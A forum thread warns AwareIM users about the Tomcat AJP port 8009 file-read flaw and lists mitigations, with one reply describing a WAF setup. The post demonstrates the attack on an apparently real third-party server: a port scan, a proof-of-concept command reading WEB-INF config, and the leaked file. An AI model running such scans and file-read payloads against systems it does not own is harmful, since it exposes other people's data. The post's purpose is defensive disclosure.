PSA: Please secure AwareIM servers (Tomcat Vulnerability).

[intra]

In the interest of everyone's security, please make sure you take appropriate steps to secure your infrastructure.

1. Do not expose more ports than needed.
2. Make sure you keep up to date with security forums or CVE advice when they are released.
3. Where possible add more 'layers' to shield key application servers from the public internet.
4. Use non privileged users (where possible) to avoid high level admin rights.

Apache foundation has a fix which is bundled with 8.5.51 and I'm sure that AwareIM will most likely include this release after some testing and validation.

What makes this exploit bad is that if you have file upload capabilities in your app, you could write a jsp component to do remote code execution.

I'm very sorry to the person who's used in the following example:

Do a quick search on google for a deployment.

Run a port scan:
nmap 181.x.x.x (protecting their ip as much as possible)

Examine for vulnerable port:
<Various ports open>
8009/tcp open ajp13 ****
<Various ports open>

Run Payload:
python poc.py -f "/WEB-INF/server-config.wsdd" 181.x.x.x
[2020-02-25 10:14:00.508] DEBUG Getting resource at ajp13://181.x.x.x:8009/xxxxxxxxxxxxxx
[<ajpy.ajp.AjpResponse object at 0x7f2520654c50>, <ajpy.ajp.AjpResponse object at 0x7f2520654cd0>, <ajpy.ajp.AjpResponse object at 0x7f2520654f10>]

Retrieve file out of webapp directory:
<?xml version="1.0" encoding="UTF-8"?>
<deployment xmlns="http://xml.apache.org/axis/wsdd/" xmlns:java="http://xml.apache.org/axis/wsdd/providers/java">
<globalConfiguration>
<parameter name="xxxxxxxx" value="xxxxxxx"/>
<parameter name="attachments.Directory" value="D:\jakarta-tomcat-3.3.1\webapps\axis\WEB-INF\attachments"/>
<parameter name="attachments.implementation" value="org.apache.axis.attachments.AttachmentsImpl"/>


Workarounds:

1. Block off public access at the firewall to port 8009 if you're not using it or filter it with IP access control.

2. Comment out port 8009 if you don't use it in Tomcat server.xml.

3. If you need port 8009, add a 'requiredSecret' directive in Tomcat server.xml.

4. Upgrade to version 8.5.51 of Tomcat

[karelh]

Thank you very much for your post. I think we need to spend more time on building secure AIM environments.

I have installed my AIM setup behind a WAF/Reverse Proxy and only expose the required port 443. Also, we do some IDS/IPS and other filtering on the traffic.

Thanks!

[intra]

Most welcome, great to hear you're also doing reverse proxy / WAF.